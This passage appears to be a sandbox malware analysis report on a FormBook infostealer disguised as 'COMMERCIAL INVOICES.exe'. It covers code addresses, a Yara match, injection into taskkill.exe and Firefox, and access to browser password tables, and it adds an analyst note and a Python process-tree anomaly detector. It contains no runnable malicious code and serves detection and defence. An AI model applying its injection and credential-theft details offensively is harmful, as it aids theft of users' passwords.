            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07135EA0 | 0_2_07135EA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07130D70 | 0_2_07130D70
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07133C20 | 0_2_07133C20
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07131B10 | 0_2_07131B10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07132371 | 0_2_07132371
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07132380 | 0_2_07132380
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_07131AC8 | 0_2_07131AC8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00418283 | 4_2_00418283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00401000 | 4_2_00401000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0042E923 | 4_2_0042E923
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0040FAE3 | 4_2_0040FAE3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00402360 | 4_2_00402360
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0041645F | 4_2_0041645F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00416463 | 4_2_00416463
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0040FD03 | 4_2_0040FD03
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0040DD83 | 4_2_0040DD83
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00402E50 | 4_2_00402E50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00402750 | 4_2_00402750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01240100 | 4_2_01240100
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012EA118 | 4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012D8158 | 4_2_012D8158
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_013041A2 | 4_2_013041A2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_013101AA | 4_2_013101AA
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_013081CC | 4_2_013081CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012E2000 | 4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0130A352 | 4_2_0130A352
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0125E3F0 | 4_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_013103E6 | 4_2_013103E6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012F0274 | 4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012D02C0 | 4_2_012D02C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01250535 | 4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01310591 | 4_2_01310591
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012F4420 | 4_2_012F4420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01302446 | 4_2_01302446
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012FE4F6 | 4_2_012FE4F6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01250770 | 4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01274750 | 4_2_01274750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0124C7C0 | 4_2_0124C7C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0126C6E0 | 4_2_0126C6E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01266962 | 4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012529A0 | 4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0131A9A6 | 4_2_0131A9A6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01252840 | 4_2_01252840
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0125A840 | 4_2_0125A840
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012368B8 | 4_2_012368B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127E8F0 | 4_2_0127E8F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0130AB40 | 4_2_0130AB40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01306BD7 | 4_2_01306BD7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0124EA80 | 4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0125AD00 | 4_2_0125AD00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012ECD1F | 4_2_012ECD1F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01268DBF | 4_2_01268DBF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0124ADE0 | 4_2_0124ADE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01250C00 | 4_2_01250C00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012F0CB5 | 4_2_012F0CB5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01240CF2 | 4_2_01240CF2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01292F284_2_01292F28
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270F304_2_01270F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F2F304_2_012F2F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C4F404_2_012C4F40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CEFA04_2_012CEFA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125CFE04_2_0125CFE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242FC84_2_01242FC8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130EE264_2_0130EE26
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250E594_2_01250E59
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130CE934_2_0130CE93
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262E904_2_01262E90
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130EEDB4_2_0130EEDB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128516C4_2_0128516C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123F1724_2_0123F172
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0131B16B4_2_0131B16B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125B1B04_2_0125B1B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F0E04_2_0130F0E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013070E94_2_013070E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FF0CC4_2_012FF0CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012570C04_2_012570C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130132D4_2_0130132D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123D34C4_2_0123D34C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0129739A4_2_0129739A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012552A04_2_012552A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F12ED4_2_012F12ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126B2C04_2_0126B2C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013075714_2_01307571
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012ED5B04_2_012ED5B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013195C34_2_013195C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F43F4_2_0130F43F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012414604_2_01241460
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F7B04_2_0130F7B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012956304_2_01295630
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013016CC4_2_013016CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E59104_2_012E5910
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012599504_2_01259950
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126B9504_2_0126B950
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BD8004_2_012BD800
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012538E04_2_012538E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FB764_2_0130FB76
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126FB804_2_0126FB80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128DBF94_2_0128DBF9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C5BF04_2_012C5BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C3A6C4_2_012C3A6C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01307A464_2_01307A46
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FA494_2_0130FA49
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EDAAC4_2_012EDAAC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01295AA04_2_01295AA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F1AA34_2_012F1AA3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FDAC64_2_012FDAC6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01307D734_2_01307D73
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01253D404_2_01253D40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01301D5A4_2_01301D5A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126FDC04_2_0126FDC0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C9C324_2_012C9C32
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FCF24_2_0130FCF2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FF094_2_0130FF09
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FFB14_2_0130FFB1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01251F924_2_01251F92
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01259EB04_2_01259EB0
Source: C:\Windows\SysWOW64\taskkill.exe | Code function (process 6, 112 functions):
  6_2_04C5E4F6, 6_2_04C62446, 6_2_04C54420, 6_2_04C70591, 6_2_04BB0535, 6_2_04BCC6E0, 6_2_04BAC7C0, 6_2_04BB0770,
  6_2_04BD4750, 6_2_04C42000, 6_2_04C681CC, 6_2_04C641A2, 6_2_04C701AA, 6_2_04C38158, 6_2_04BA0100, 6_2_04C4A118,
  6_2_04C302C0, 6_2_04C50274, 6_2_04C703E6, 6_2_04BBE3F0, 6_2_04C6A352, 6_2_04BA0CF2, 6_2_04C50CB5, 6_2_04BB0C00,
  6_2_04BC8DBF, 6_2_04BAADE0, 6_2_04BBAD00, 6_2_04C4CD1F, 6_2_04C6EEDB, 6_2_04BC2E90, 6_2_04C6CE93, 6_2_04C6EE26,
  6_2_04BB0E59, 6_2_04BBCFE0, 6_2_04C2EFA0, 6_2_04BA2FC8, 6_2_04C24F40, 6_2_04BD0F30, 6_2_04BF2F28, 6_2_04C52F30,
  6_2_04B968B8, 6_2_04BDE8F0, 6_2_04BB2840, 6_2_04BBA840, 6_2_04BB29A0, 6_2_04C7A9A6, 6_2_04BC6962, 6_2_04BAEA80,
  6_2_04C66BD7, 6_2_04C6AB40, 6_2_04BA1460, 6_2_04C6F43F, 6_2_04C4D5B0, 6_2_04C67571, 6_2_04C616CC, 6_2_04C6F7B0,
  6_2_04C5F0CC, 6_2_04C6F0E0, 6_2_04C670E9, 6_2_04BB70C0, 6_2_04BBB1B0, 6_2_04C7B16B, 6_2_04B9F172, 6_2_04BE516C,
  6_2_04BB52A0, 6_2_04C512ED, 6_2_04BCB2C0, 6_2_04BF739A, 6_2_04C6132D, 6_2_04B9D34C, 6_2_04C6FCF2, 6_2_04C29C32,
  6_2_04BCFDC0, 6_2_04C61D5A, 6_2_04C67D73, 6_2_04BB3D40, 6_2_04BB9EB0, 6_2_04BB1F92, 6_2_04B73FD5, 6_2_04B73FD2,
  6_2_04C6FFB1, 6_2_04C6FF09, 6_2_04BB38E0, 6_2_04C1D800, 6_2_04C45910, 6_2_04BB9950, 6_2_04BCB950, 6_2_04C5DAC6,
  6_2_04BF5AA0, 6_2_04C51AA3, 6_2_04C4DAAC, 6_2_04C67A46, 6_2_04C6FA49, 6_2_04C23A6C, 6_2_04C25BF0, 6_2_04BCFB80,
  6_2_04BEDBF9, 6_2_04C6FB76, 6_2_00861B00, 6_2_008703E0, 6_2_0085CA20, 6_2_0085ACC0, 6_2_0085CC40, 6_2_008651C0,
  6_2_0086339C, 6_2_008633A0, 6_2_0087B860, 6_2_04A4E445, 6_2_04A4E7DD, 6_2_04A4E324, 6_2_04A4D848, 6_2_04A4CB08
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: String function: 04C1EA12 appears 86 times
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: String function: 04BE5130 appears 58 times
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: String function: 04C2F290 appears 105 times
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: String function: 04BF7E54 appears 102 times
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: String function: 04B9B970 appears 280 times
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: String function: 012BEA12 appears 86 times
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: String function: 01285130 appears 58 times
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: String function: 012CF290 appears 105 times
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: String function: 01297E54 appears 111 times
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: String function: 0123B970 appears 280 times

Note on the two function lists above: every 0x04Bxxxxx/0x04Cxxxxx function in taskkill.exe (process 6) sits exactly 0x03960000 above the corresponding function in COMMERCIAL INVOICES.exe (process 4), e.g. 4_2_012EA118 / 6_2_04C4A118, 4_2_01240100 / 6_2_04BA0100, and the string functions 012BEA12 / 04C1EA12 and 0123B970 / 04B9B970 with identical call counts. The same code is therefore present in both processes at different base addresses, which is what the injection signatures in the overview describe. The extra taskkill.exe functions at 0x0085xxxx have no counterpart in process 4; that region (0x00850000) is also one of the process 6 memory dumps matched by the FormBook Yara rule below.
Source: COMMERCIAL INVOICES.exe | Static PE information: invalid certificate
Source: COMMERCIAL INVOICES.exe, 00000000.00000000.2036488621.000000000079E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJyn.exe6 vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe, 00000000.00000002.2382464563.0000000008C70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe, 00000000.00000002.2377057061.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.000000000133D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametaskkill.exej% vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe | Binary or memory string: OriginalFilenameJyn.exe6 vs COMMERCIAL INVOICES.exe
Source: COMMERCIAL INVOICES.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23), matched in the following sources:
  Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
  Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
  Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: COMMERCIAL INVOICES.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.SetAccessControl
Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.AddAccessRule
Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.SetAccessControl
Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.AddAccessRule
Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, q598vXWMJVqmSJ4TcV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, q598vXWMJVqmSJ4TcV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.SetAccessControl
Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs | Security API names: _0020.AddAccessRule
Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, q598vXWMJVqmSJ4TcV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COMMERCIAL INVOICES.exe.log
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\taskkill.exe | File created: C:\Users\user\AppData\Local\Temp\2636-l0
Source: COMMERCIAL INVOICES.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: taskkill.exe, 00000006.00000003.2721451658.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2723146338.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3897956616.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3897956616.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2721360594.0000000002B47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: COMMERCIAL INVOICES.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Process created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
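The process tree above is the most useful hunting artefact in this section: a .NET loader re-launching its own image, a child process whose parent sits in a random-looking directory under Program Files (x86), and taskkill.exe (a utility that normally spawns nothing) starting Firefox. The following script is an added example, not part of the Joe Sandbox report: it parses "Process created" rows in the report's raw column layout (the sample rows are copied from the report, with the parent and child columns re-separated by a tab, which this page's extraction fused), rebuilds the parent/child tree and flags those three patterns. The LEAF_UTILITIES and BROWSERS sets and the length/entropy thresholds for a "random" directory name are assumptions chosen for this example.

```python
"""Rebuild a process tree from sandbox 'Process created' rows and flag
parent/child pairs that do not occur on a clean host."""
import re
from collections import defaultdict
from math import log2

# Constructed sample input: the four 'Process created' rows from the report,
# parent and child columns joined by a tab as in the raw table export.
REPORT_ROWS = [
    "Source: unknown\tProcess created: C:\\Users\\user\\Desktop\\COMMERCIAL INVOICES.exe "
    "\"C:\\Users\\user\\Desktop\\COMMERCIAL INVOICES.exe\"",
    "Source: C:\\Users\\user\\Desktop\\COMMERCIAL INVOICES.exe\tProcess created: "
    "C:\\Users\\user\\Desktop\\COMMERCIAL INVOICES.exe \"C:\\Users\\user\\Desktop\\COMMERCIAL INVOICES.exe\"",
    "Source: C:\\Program Files (x86)\\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL"
    "\\oKWoZthfkV.exe\tProcess created: C:\\Windows\\SysWOW64\\taskkill.exe \"C:\\Windows\\SysWOW64\\taskkill.exe\"",
    "Source: C:\\Windows\\SysWOW64\\taskkill.exe\tProcess created: "
    "C:\\Program Files\\Mozilla Firefox\\firefox.exe \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\"",
]

ROW_RE = re.compile(
    r'^Source: (?P<parent>.*?)\tProcess created: (?P<child>.*?\.exe) "(?P<cmdline>.*)"$'
)

# Assumed lists: command-line utilities that finish and exit without launching
# anything, and the browsers a credential stealer typically opens or injects into.
LEAF_UTILITIES = {"taskkill.exe", "tasklist.exe", "whoami.exe", "systeminfo.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def shannon_entropy(text):
    """Bits per character of the string; random-looking names score well above 4.0."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * log2(c / n) for c in counts.values())


def parse_rows(rows):
    """Return one dict (parent, child, cmdline) per row that matches the layout."""
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            events.append(m.groupdict())
    return events


def build_tree(events):
    """Map parent image path -> list of child image paths; the root parent is 'unknown'."""
    tree = defaultdict(list)
    for ev in events:
        tree[ev["parent"]].append(ev["child"])
    return tree


def looks_random_dir(path):
    """True if any directory component is long and high-entropy (thresholds assumed)."""
    parts = path.split("\\")[:-1]
    return any(len(p) >= 24 and shannon_entropy(p) > 4.0 for p in parts)


def find_anomalies(events):
    """Return (rule, parent basename, child basename) for every suspicious pair."""
    findings = []
    for ev in events:
        parent, child = ev["parent"], ev["child"]
        pb, cb = basename(parent), basename(child)
        if parent.lower() == child.lower():
            # a loader re-launching its own image is the usual hollowing setup
            findings.append(("self-spawn", pb, cb))
        if pb in LEAF_UTILITIES and cb in BROWSERS:
            findings.append(("leaf-utility-spawns-browser", pb, cb))
        if looks_random_dir(parent):
            findings.append(("random-directory-parent", pb, cb))
    return findings


if __name__ == "__main__":
    evs = parse_rows(REPORT_ROWS)
    for parent, children in build_tree(evs).items():
        label = "<root>" if parent == "unknown" else basename(parent)
        print(label, "->", ", ".join(basename(c) for c in children))
    for rule, pb, cb in find_anomalies(evs):
        print(f"[{rule}] {pb} -> {cb}")
```

Run against the four rows it reports self-spawn for the loader, random-directory-parent for the oKWoZthfkV.exe parent of taskkill.exe, and leaf-utility-spawns-browser for taskkill.exe starting firefox.exe. The parent-path rule is deliberately a heuristic: on a real host, compare the reported parent image against the on-disk file and the real parent PID, since a spoofed image path in the PEB will not survive that check.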
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: vcruntime140_clr0400.dll
